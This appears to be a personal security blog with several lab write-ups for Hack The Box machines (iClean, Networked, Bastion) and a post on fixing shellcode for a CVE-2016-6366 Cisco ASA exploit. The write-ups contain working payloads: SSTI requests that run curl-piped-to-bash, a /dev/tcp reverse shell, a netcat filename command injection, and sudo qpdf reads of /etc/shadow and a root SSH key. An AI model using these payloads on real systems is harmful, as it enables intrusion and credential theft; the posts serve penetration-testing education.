Joe Graham

Htb_iclean

2024-04-15T00:00:00+00:00

layout: post title: “Hack The Box Write-up: iClean” date: 2024-04-15 00:00:00 -0400 categories: posts htb pentesting — iClean is a Linux box created by LazyTitan33 that is rated medium by the HTB community. iClean’s exploit process involves exploiting a web application vulnerable to blind cross-site scripting (XSS), server-side template injection (SSTI), and then privilege escalation via an arbitrary write as root vulnerability in the sudo configuration.

Network Enumeration

As usual, we start by enumerating the open ports and services on the system.

# Nmap 7.94SVN scan initiated Mon Apr 15 12:07:52 2024 as: nmap -p- -sV -oA 10.10.11.12 -v 10.10.11.12
Nmap scan report for capiclean.htb (10.10.11.12)
Host is up (0.027s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 15 12:07:59 2024 -- 1 IP address (1 host up) scanned in 7.04 seconds

HTTP

The only usable listening service at our disposal is HTTP. Browsing to the index page of the site reveals this page:

The menu bar in the top right of the page lists 5 menu options, as shown below.

I browsed through each page to enumerate the application’s functionality, and found a page to obtain a quote for services at http://capiclean.htb/quote. The page is shown below.

I found that the email address field was vulnerable to Blind XSS. I discovered the vulnerability when I sent a crafted request for carpet cleaning. A normal quote generated an HTTP POST request to http://capiclean.htb/sendMessage and was captured by the Burp Suite proxy as shown below.

Request:
POST /sendMessage HTTP/1.1
Host: capiclean.htb
[snip]
Cookie: Session=eyJyb2xl[snip]M3rkM
Upgrade-Insecure-Requests: 1

service=Carpet+Cleaning&email=test%40capiclean.htb

Response:
HTTP/1.1 200 OK
[snip]
Server: Werkzeug/2.3.7 Python/3.10.12
[snip]

I chose a payload that would send the victim’s cookies to a Netcat listener on port 1337. The payload and the URL encoded version of the payload is shown below in the Decoder component in Burp Suite.

"" />

I saved the cookie in Cookie Manager and browsed to /dashboard, which allowed me access to the application’s admin panel.

Server-Side Template Injection (SSTI)

I browsed to each of the new pages and found the QR generation page accepted an invoice number generated by the “Generate Invoice” page.

The next page allowed the user to enter a link to a QR code that would be added to an invoice generated by the page.

An invoice generated with “test” for the link is shown below.

The QR-link field can be leveraged to inject arbitrary data in the Jinja2 Python templating engine used by the web application. I identified that the website was using Flask by noticing the Server header in each response returned by the application. HackTricks includes a primer on different payloads for testing injection as well as how to leverage injection to obtain arbitrary read/write and RCE via the templating engine. I demonstrated this vulnerability first by injecting {{config.items()}} into the QR link field.

Request:
POST /QRGenerator HTTP/1.1
Host: capiclean.htb
[snip]
Cookie: Session=eyJyb2xl[snip]M3rkM
Upgrade-Insecure-Requests: 1

invoice_id=&form_type=scannable_invoice&qr_link={{config.items()}}

Response:
[snip]

While testing several payloads, I found that certain characters caused the application to return an HTTP 500 response. For example, requests with _ in the field returned an HTTP 500.

Request:
POST /QRGenerator HTTP/1.1
Host: capiclean.htb
[snip]
Cookie: Session=eyJyb2xl[snip]M3rkM
Upgrade-Insecure-Requests: 1

invoice_id=&form_type=scannable_invoice&qr_link={{[].__class__}}

Response:
HTTP/1.1 500 INTERNAL SERVER ERROR
[snip]



  
    500 Internal Server Error
  
  
    Internal Server Error
  
  
    The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.

Encoding the payload with the format \x + hex_code allowed the request to go through. The root directory on the webserver was displayed in place of the QR code URL.

Request:
POST /QRGenerator HTTP/1.1
Host: capiclean.htb
[snip]
Cookie: Session=eyJyb2xl[snip]M3rkM
Upgrade-Insecure-Requests: 1

invoice_id=&form_type=scannable_invoice&qr_link={{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365]('ls /',shell=True,stdout=-1).communicate()}}

Response:
[snip]

I then crafted an RCE payload following the steps given in the HackTricks writeup. The request and response in Burp Suite Repeater are shown below.

Request:
POST /QRGenerator HTTP/1.1
Host: capiclean.htb
[snip]
Cookie: Session=eyJyb2xl[snip]M3rkM
Upgrade-Insecure-Requests: 1

invoice_id=&form_type=scannable_invoice&qr_link={{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365]('curl http://10.10.14.225:1337',shell=True,stdout=-1).communicate()}}
Response:
HTTP/1.1 200 OK
[snip]

A Netcat listener open on 1337 successfully received the HTTP request generated by the curl command.

(kali@kali)-[~/htb/iclean]
$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.225] from capiclean.htb [10.10.11.12] 46820
GET / HTTP/1.1
Host: 10.10.14.225:1337
User-Agent: curl/7.81.0
Accept: */*

I wrote a bash reverse shell that would connect back to port 1337, which is shown here. I placed it in /var/www/html and then started the Apache webserver on my Kali VM.

(kali@kali)-[/var/www/html]
$ cat payload.sh
/bin/bash -i >& /dev/tcp/10.10.14.225/1337 0>&1

I triggered another command to request the payload and pass the payload to a new bash process, as shown below.

Request: 
POST /QRGenerator HTTP/1.1
Host: capiclean.htb
[snip]
Cookie: Session=eyJyb2xl[snip]M3rkM
Upgrade-Insecure-Requests: 1

invoice_id=&form_type=scannable_invoice&qr_link={{""["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[365]('curl http://10.10.14.225/exploit.sh|bash',shell=True,stdout=-1).communicate()}}

Response:
HTTP/1.1 200 OK
[snip]

A reverse shell was spawned and connected to the netcat listener.

(kali@kali)-[~/htb/iclean]
$ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.225] from capiclean.htb [10.10.11.12] 48474
bash: cannot set terminal process group (1203): Inappropriate ioctl for device
bash: no job control in this shell
www-data@iclean:/opt/app$

User own

While this is a step in the right direction, the www-data user doesn’t have a lot of access on the system. The user is able to look at all files within /opt/app, which includes the app.py file used to serve the web application. At the top of the file there were credentials to connect to a MySQL database used to store records used by the web application.

www-data@iclean:/opt/app$ cat app.py
cat app.py
from flask import Flask, render_template, request, jsonify, make_response, session, redirect, url_for
from flask import render_template_string
import pymysql
import hashlib
impot os
import random, string
import pyqrcode
from jinaj2 import StrictUndefined
from io import BytesIO
import re, requests, base64

app = Flask(__name__)

app.config['SESSION_COOKIE_HTTPONLY'] = False

secret_key = ''.join(random.choice(string.ascii_lowercase) for i in range(64))
app.secret_key = secret_key
# Database Configuration
db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}

It would be unwieldy to try to use the MySQL client over a reverse shell, so I used Chisel to forward the MySQL port on the iclean box to my Kali VM. The command I used to forward the port is shown below.

www-data@iclean:~$ ./chisel client 10.10.14.225:4444 R:3306:localhost:3306
./chisel client 10.10.14.225:4444 R:3306:localhost:3306
2024/04/14 21:57:10 client: Connecting to ws://10.10.14.225:4444
2024/04/14 21:57:11 client: Connected (Latency 32.271668ms)

I was then able to connect to the iclean box’s MySQL server using the MySQL client on my Kali box.

(kali@kali)-[~/htb/iclean]
$ mysql -u iclean -ppxCsmnGLckUb -h 127.0.0.1
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 13312
Server version: 8.0.36-0ubuntu0.22.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

I enumerated the database and found a users table in the capiclean database, which included the admin user as well as a user named consuela in the application.

I entered both hashes into CrackStation, and the password hash for consuela was successfully cracked.

Using this information, I was able to login as consuela over SSH to the box and obtain the user flag.

(kali@kali)-[/var/www/html]
$ ssh consuela@capiclean.htb
The authenticity of host 'capiclean.htb (10.10.11.12)' can't be established.
ED25519 key fingerprint is SHA256:[snip]
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'capiclean.htb' (ED25519) to the list of known hosts.
consuela@capiclean.htb's password:
Welcome to Ubuntu 22.0.4.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
[snip]
You have mail.
consuela@iclean:~$

User Enumeration

After getting access to the consuela user, I began enumerating information about the box. Out of habit I usually run the sudo -l command at the start of any user enum on *nix systems since it’s easy to misconfigure sudo in a way that allows privilege escalation to root. As luck would have it, the user does have access to running a command via sudo, as shown below.

consuela@iclean:~$ sudo -l
[sudo] password for consuela:
Matching Defaults entries for consuela on iclean:
[snip]

User consuela may run the following commands on iclean:
    (ALL) /usr/bin/qpdf

Privilege Escalation

qpdf is a content-preserving PDF document transformer. We don’t need to know much about how the utility works, other than that it can read and write to any files that are owned by the user the program is running as.

qpdf has three command parameters that can be utilized to attach, list, and display attachments to a pdf file. They are:

--add-attachment
--list-attachment
--show-attachments

The functions are self-explanatory. At first I used the utility to obtain the /etc/shadow file by adding it as an attachment to a sample PDF that was accessible as the consuela user, as shown below.

consuela@iclean:~$ sudo qpdf test.pdf --add-attachment /etc/shadow -- shadow.pdf

However, the root password was not able to be cracked using CrackStation or John the Ripper and hashcat. Instead of spending more time trying to crack the hash, I instead tried to obtain a private key from /root/.ssh/id_rsa which is shown below.

consuela@iclean:~$ sudo qpdf test.pdf --add-attachment /root/.ssh/id_rsa -- privkey.pdf

I then attempted to login as root via SSH, which was successful, as shown below.

(kali@kali)-[~/htb/iclean/privesc]
$ ssh -i privkey root@capiclean.htb
Welcome to Ubuntu 22.0.4.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
[snip]
root@iclean:~#

Conclusion

This was a fun and creative box, pretty solidly tailored towards my areas of expertise: web application security and Linux privilege escalation. Thank you to LazyTitan53 for creating this box!

Porting_cve 2016 6366

2022-01-21T00:00:00+00:00

layout: post title: “Porting an Exploit for CVE-2016-6366” date: 2022-01-21 00:00:00 -0400 categories: posts cve — A few years ago I wrote a blog post for a class I was taking in school exploring the Cisco Adaptive Security Appliance and trying to port the exploit to a known vulnerable version of the firmware that did not yet have an exploit written for it. As you can see from how the post ends, I ran out of time that semester and was unable to finish the exploit. In 2018 I picked the project back up and successfully ported the exploit. In continuing my habit of picking up old projects years later, this post serves as an update to the original post explaining the problem and how I solved it.

Picking Up Where We Left Off

The vulnerability in question is a buffer overflow in the Simple Network Management Protocol (SNMP) within the ASA, specifically the code implementing the getBulkRequest method. The overflow exists in the part of the code that reads in the Management Information Base number sent as part of the request.

The exploit patches the password verification function used by the ASA to check passwords. When throwing the RiskSense improved exploit at the ASA, instead of patching the function, the ASA crashes. The crashdump generated by the ASA looks like this:

Debugging Shellcode with gdbserver

The shellcode used by the RiskSense exploit code is helpfully included in nasm format in the repo for the exploit. The shellcode is fairly straightforward: it stores the original values of the various registers on the stack, calls the sys_mprotect system call to allow the password check function to be modified, copies the patch code, then returns. The small amount of code means there were not that many areas where something could’ve went wrong. To investigate further, I used the gdbserver included with the ASA for debugging purposes to troubleshoot the shellcode. The asatools scripts discussed in the first blog post automates the process for patching the firmware to enable the gdbserver on startup.

Let’s take another look at the crashdump. The instruction pointer is pointing at 0xcb980943, which is in the area of memory the stack is stored in. The shellcode makes changes to eax, esi, edi, ebx, and ebp. ebx, ebp, and edi are all set to the values that the shellcode changes them to before returning execution, which suggests that the code crashed towards the end of execution.

Using the gdbserver and a gdb client on a workstation connected to the ASA over a serial connection, we can set a breakpoint at the SNMP function right before it jumps to the shellcode and look at the values of the registers at that point as well as when the code crashes to investigate further.

Troubleshooting the Shellcode

In a quirk of the shellcode that was either to make it more difficult for script kiddies to run the exploit on unpatched ASAs or an artifact from development that was accidentally left in, the shellcode includes a breakpoint just before returning execution, which made it much easier to troubleshoot further but was the actual cause for the crash - the hardware interrupt is not caught by a debugger, so the lina binary and thus the ASA crashes. The breakpoint being hit in gdb is shown below.

Thread 2 hit Breakpoint 2, 0x0907e34e in ?? ()
(gdb) info register
eax             0x2      2
ecx             0xcc45b988      -867845752
edx             0xcc0dc600      -871512576
ebx             0xcc0dc600      -871512576
esp             0xcc0dc5c8      0xcc0dc5c8
ebp             0xcc0dc610      0xcc0dc610
esi             0x4      4
edi             0x10     16
eip             0x907e34e
[snip]

However, even if you remove the breakpoint, the exploit would still break. Updated gdb output is below.

Thread 2 received signal SIGTRAP, trace/breakpoint trap.
[Switching to Thread 491]
0xcc471113 in ?? ()
(gdb) info register
eax             0x0         0
ecx             0x0         0
edx             0x0         0
ebx             0x10        16
esp             0xcc0dc51c          0xcc0dc51c
ebp             0xcc0dc564          0xcc0dc564
esi             0x0         0
edi             0xf0f0f0b           252645131
eip             0xcc471113          0xcc471113
[snip]

As you can see from the register values, the stack pointers ebp and esp are off by four when reset by the shellcode. Because the stack is not being properly returned to its original structure prior to the exploit, whenever the ASA references something on the stack after exploitation, the value of whatever variable is going to be wrong, causing more problems.

Solution

To fix the shellcode, I removed the hardware interrupt and added one more instruction that adds 4 bytes to ebp before the ebp offset is added back to ebp. You can see these changes in my fork of the RiskSense repo.

Htb_networked

2019-08-30T00:00:00+00:00

layout: post title: “Hack The Box Write-up: Networked” date: 2019-08-30 00:00:00 -0400 categories: posts htb pentesting — Networked is a Linux box created by Guly that is rated fairly easily by the HTB community. Even though it was fairly easy, I got some good practice with command injection vulnerabilities and circumventing file verification methods.

Enumeration

Let’s start by taking a look at what services are running on the box using nmap.

Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-30 16:16 EDT
Nmap scan report for 10.10.10.146
Host is up (0.26s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
443/tcp closed https

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1875.57 seconds

HTTP

The only usable listening service at our disposal is HTTP. Browsing to the index page of the site reveals this page:

Since there isn’t really anything useful on this page, lets throw dirb at the site to see if we can find any other pages.

root@kali:networked# dirb http://10.10.10.146 /usr/share/wordlists/dirb/big.txt
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Aug 30 17:14:07 2019
URL_BASE: http://10.10.10.146/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://10.10.10.146/ ----
==> DIRECTORY: http://10.10.10.146/backup/
+ http://10.10.10.146/cgi-bin/ (CODE:403|SIZE:210)

==> DIRECTORY: http://10.10.10.146/uploads/
---- Entering directory: http://10.10.10.146/backup/ ----
(WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode -w if you want to scan it anyway)
---- Entering directory: http://10.10.10.146/uploads/ ----
-----------------
END_TIME: Fri Aug 30 17:52:43 2019
DOWNLOADED: 40916 - FOUND: 1

We have two useful directories: backup and uploads. The uploads directory is not listable, and the index.html page has a single “.” as its content, so it’s not useful to us right now. The backup directory is listable though, and contains a single backup.tar file that we can download and extract.

root@kali:downloads# tar -xvf backup.tar
index.php
lib.php
photos.php
upload.php

The contents of the tarball are copies of the source used on the webserver, and we can browse to all of these files at the root of the website. photos.php is a gallery of photos that have been uploaded to the site via upload.php. The photos uploaded are named by their IP, and uploads have their filename changed to the IP used to upload them. The file extension remains the same.

The upload.php page is extremely basic, just containing a browse button that allows selecting a file to upload, and an upload button.

Looking at the source code gained from backup.tar, index.php and photos.php are basic pages that implement how they look without much additional logic. lib.php is a library file that is loaded by photos.php and upload.php and contains functions used to validate the IP address of the uploader, generate the filename used for each upload, and to verify that an uploaded file’s extension matches its MIME data type. upload.php contains the code to process uploads as well as to display the upload form.

As we can see in the above code, the file is first checked using the check_file_type function loaded from lib.php to determine if the file has a MIME data type that starts with “image/”. The code also checks to see if the uploaded file extension is .jpg, .png, .gif, or .jpeg. If both checks pass the uploaded file is moved to the upload directory with the name changed to match the uploading IP address. The if statement with the data type check also contains a check that the uploaded file is less than 60000 bytes. This appears to be a programming error, since the use of the logical and would allow a non-image file with a size greater than 60000 bytes to pass this check. This may have been an avenue for exploitation, but I chose not to look into this much further.

Looking more closely at the file verification code, we can see that either finfo_file or mime_content_type is called on the file to check to see if the file uploaded is actually an image, depending on if the function can be found. Experimenting with uploads, I found that it’s possible to fool both of these function calls by crafting a file that contains the file signature for a JPEG and has a .jpg extension on the end but contains PHP code within it.

root@kali:80# xxd payload.php.jpg
00000000: ffd8 ffe0 0010 4a46 4946 0001 0a3c 3f70  ......JFIF...
00000030: 0a

Just uploading this file, even as a .jpg, will not work. Firefox apparently does better detection of files than PHP does, and sets the Content-Type header in the POST request issued by uploading this file to ‘application/x-php’.

finfo_file and mime_content_type both check the Content-Type header, so leaving this as is causes the malicious upload to be detected. Changing the Content-Type to ‘image/jpeg’ allows the upload to occur successfully.

Browsing to the photo gallery, we can see that the page fails to render correctly, but is displayed with the other photos.

We can browse directly to the page by going to uploads/[ip].php.jpg. Firefox renders the page like a normal text file, and adding a cmd parameter shows that we have gained remote code execution as the apache user.

The server conveniently has the nmap utility ncat installed, allowing us to get a shell on the box.

Webserver shell

When I was working on this box, there were a lot of other users who would frequently request resets or cause trouble that made it difficult to work with at times. For that reason, I used Metasploit’s multi/handler exploit with a generic/shell_reverse_tcp payload to handle shells, instead of just directly using netcat. This made it slightly easier if I missed a reset notification or something broke to just run the payload and get another session instead of having to restart netcat.

The reverse shell lacks a pty to start with, but Python is installed on the box, easily fixing this.

Doing some recon we find that the user for this box is named guly. guly’s home directory contains three files: a PHP script called check_attack.php, a crontab, and the user.txt file. The crontab shows that check_attack.php is called every three minutes. This is what check_attack.php contains:

require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg = '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
    if ($value == 'index.html') {
        continue;
    }
    #echo "----------\n";

    #print "check: $value\n";
    list ($name, $ext) = getnameCheck($value);
    $check = check_ip($name, $value);

    if (!($check[0])) {
        echo "attack!\n";
        # todo: attach file
        file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

        exec("rm -f $logpath");
        exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
        echo "rm -f $path$value\n";
        mail($to, $msg, $msg, $headers, "-F$value");
    }
}
?>

This is very promising. check_attack looks through each file in the uploads directory and checks to see if the filename is an IP address. If the filename is not an IP address, it either creates an empty file at /tmp/attack.log or, if it exists, opens it for appending and puts an empty string at the end of the file. /tmp/attack.log is then deleted for some reason and the file is deleted using an exec call. This call does not sanitize the filename at all, allowing us to inject a command to be run as guly through the filename. We now have a shell on the box as an actual user instead of the Apache service user.

bash-4.2$ cd /var/www/html/uploads
cd /var/www/html/uploads
bash-4.2$ touch '; nc 10.10.14.152 4445 -c bash'
bash-4.2$ ls
ls
[various web shells]
; nc 10.10.14.152 445 -c bash
; nc 10.10.15.2 -c bash
; nc 10.10.15.2 1111 -c bash
[snip]
index.html
bash-4.2$ ^Z
Background session 1 [y/N] y
msf5 exploit(multi/handler) > [*] Command shell session 2 opened 10.10.14.152:4445 -> 10.10.10.1466:38752) at 2019-08-30 19:02:26 -0400

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

python -c 'import pty;pty.spawn("bash")'
[guly@networked ~]$

User shell

I did two things before beginning user post-exploitation. First, I deleted the injection file created in the last step. Getting a new user shell every three minutes is redundant and a waste of resources. Next, I copied an SSH public key into guly’s home directory. The user shell has a pty allocated but still lacks command history, which is annoying. Copying a public key allows us to SSH into the box as guly.

authorized_keys; chmod 600 authorized_keys. Lower pane cats guly.pub into nc -lvp 5555 and ssh's into networked as guly using the private key." />

The first things I do after getting user access on a Linux box are to identify the distribution and kernel version information, using cat /etc/*release* and uname -a. This box is running CentOS 7 with kernel version 3.10.0. This is an up to date version of the kernel with no public privesc vulns that apply. Next, I see if this user has any sudo privileges using sudo -l. The user is allowed to run a script at /usr/local/sbin/changename.sh without having to type a password, which is very promising. Here are the contents of that file:

[guly@networked ~]$ cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-gul << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0
[guly@networked ~]$

This script overwrites a network script file named ifcfg-guly with data provided by answering the questions provided by the script.

Root privesc

It appears that commands can be injected into network script files, which are run when /sbin/ifup is called at the end of changename.sh. Running sudo /usr/local/sbin/changename.sh and injecting a sudo su as the interface name escalates privileges to root.

[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
sudo su
interface PROXY_METHOD:
asdf
interface BROWSER_ONLY:
asdf
interface BOOTPROTO:
asdf
[root@networked network-scripts]#

Conclusion

I got stumped for longer than I’d like to admit on the privilege escalation, as I forgot that a user can see what sudo privileges they have using sudo -l if they can’t read /etc/sudoers. I also enjoyed figuring out how to workaround the image verification, and did not know that you could inject commands into systemd network scripts. Overall, this was a fairly easy box that reinforces post-exploitation enumeration skills.

Htb_bastion

2019-08-05T00:00:00+00:00

layout: post title: “Hack The Box Write-up: Bastion” date: 2019-08-05 00:00:00 -0400 categories: posts htb pentesting — This is my first in a series of write-ups on systems I’ve successfully exploited on HackTheBox. Bastion is a Windows host that at the time of writing has been rated fairly easy by other hackers, which was my experience as well. However, this system was still a fun system to exploit with a novel way of getting user access.

Enumeration

root@kali:bastion# nmap -p- -sV 10.10.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-05 20:49 EDT
Nmap scan report for 10.10.10.134
Host is up (0.060s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.64 seconds

One of the first things that stands out to me is that this host has OpenSSH listening on port 22. Microsoft recently integrated OpenSSH into Windows, but this is the first time I’ve seen it running as a service on a Windows host in the wild. We can’t do anything with SSH right now, but this does indicate that this host is a Windows 10 or Windows Server 2016 or 2019 box, since OpenSSH is only available on this flavor of Windows. We will come back to this service later on in the write-up.

SMB

Other than SSH and WinRM, the only other listening useful service is SMB. For SMB, I usually use a mix of enum4linux and smbmap to try to enumerate information about listening shares and the level of access provided by the server. First, I tried enumerating access using an anonymous logon, which would be rare on such a modern version of Windows, but is still worth a shot.

root@kali:smb# enum4linux 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 20:58:24 2019

--snip--
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

Unfortunately, anonymous access didn’t get us anything. It has, thankfully, gotten progressively more difficult to set up anonymous SMB shares in Windows over the years, so this is pretty realistic. One other thing I like to try to enumerate access is by using the built-in Guest account with no password. Let’s give that a shot.

root@kali:smb# enum4linux -u Guest 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 21:01:33 2019

--snip--
 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.134    |
 ==================================================== 
[E] Can't find workgroup/domain


 ===================================== 
|    Session Check on 10.10.10.134    |
 ===================================== 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.134 allows sessions using username 'Guest', password ''
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.134    |
 =========================================== 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 359.
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
[+] Can't determine if host is part of domain or part of a workgroup
enum4linux complete on Mon Aug  5 21:01:44 2019

It looks like the server allows connections as Guest! Running enum4linux with the -a parameter only listed what shares the Guest user is able to access, and nothing else helpful.

root@kali:smb# enum4linux -a -u Guest 10.10.10.134
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Aug  5 21:03:25 2019

--snip--

 ========================================= 
|    Share Enumeration on 10.10.10.134    |
 ========================================= 
Use of uninitialized value  in concatenation (.) or string at ./enum4linux.pl line 640.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

 Sharename       Type      Comment
 ---------       ----      -------
 ADMIN$          Disk      Remote Admin
 Backups         Disk      
 C$              Disk      Default share
 IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
Failed to connect with SMB1 -- no workgroup available

--snip--

I didn’t expect to be able to access the default administrative shares (ADMIN$, C$, and IPC$), and attempting to connect using smbclient confirmed that. However, the Backups share seems interesting to us. Let’s see what’s inside that share.

root@kali:smb# smbclient -U Guest //10.10.10.134/Backups
Enter WORKGROUP\Guest's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Aug  5 21:09:35 2019
  ..                                  D        0  Mon Aug  5 21:09:35 2019
  ASwYWuILip                          D        0  Mon Aug  5 20:51:59 2019
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  oTWBZwpEdv                          D        0  Mon Aug  5 20:51:50 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  tmp                                 A      116  Mon Aug  5 21:09:35 2019
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

                7735807 blocks of size 4096. 2788438 blocks available

This confirms what the name of the share suggests: this share is used for backups by other systems in this scenario. The other folders and files are artifacts of various SMB scanners verifying read/write access on the share, which are left behind because the Guest user can only read and create files on the share, not delete them. note.txt contains the following text: “Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.” I believe this is a hint to help transfer files that we find later on. Looking further into the WindowsImageBackup folder, there appears to be a single backup for the L4mpje-PC system performed on February 22, 2019. L4mpje is the name of the creator of this box, so we’re on the right track. Listing the contents of the directory for this backup reveals two large files, as well as some other metadata:

smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
  .                                   D        0  Fri Feb 22 07:45:32 2019
  ..                                  D        0  Fri Feb 22 07:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd      A 37761024  Fri Feb 22 07:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd      A 5418299392  Fri Feb 22 07:45:32 2019
  BackupSpecs.xml                     A     1186  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml      A     1078  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml      A     8930  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml      A     6542  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml      A     2894  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml      A     1488  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml      A     1484  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml      A     3844  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml      A     3988  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml      A     7110  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml      A  2374620  Fri Feb 22 07:45:32 2019

                7735807 blocks of size 4096. 2788327 blocks available

The two vhd’s at the top are very attractive targets, but the size of the download caused timeouts that caused the download to fail at first. Using the timeout command and setting the value to a much bigger timeout allows these files to be downloaded.

Disk image forensics

I had trouble mounting the first disk image, but it turns out the second disk image was the more important one anyway, as it has the Windows filesystem on it.

